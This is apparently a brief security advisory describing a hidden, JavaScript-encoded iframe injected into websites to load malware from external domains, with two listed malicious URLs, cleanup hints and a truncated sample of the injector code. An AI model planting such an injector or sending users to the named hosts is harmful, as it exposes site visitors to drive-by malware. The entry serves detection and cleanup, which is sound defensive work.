Description:
A hidden and malicious iframe was identified. It is encoded through javascript to make it hard to identify the source.
It loads malware from multiple sources:
http://www.lifeshiftdevelopment.com/stats.php
http://www.couchtarts.com/media.php
(and many other domains).
This is used to load malware from external web sites while not being visible to the user.
Affecting:
Any web site
Clean up:
This malware is generally hidden on .js or .php files without heavy encoding.
Malware dump (sample of malware):
var url="http://www.lifeshiftdevelopment.com/stats.php";if((navigator.userAgent.toLowerCase().indexOf("msie")... f=document.createElement..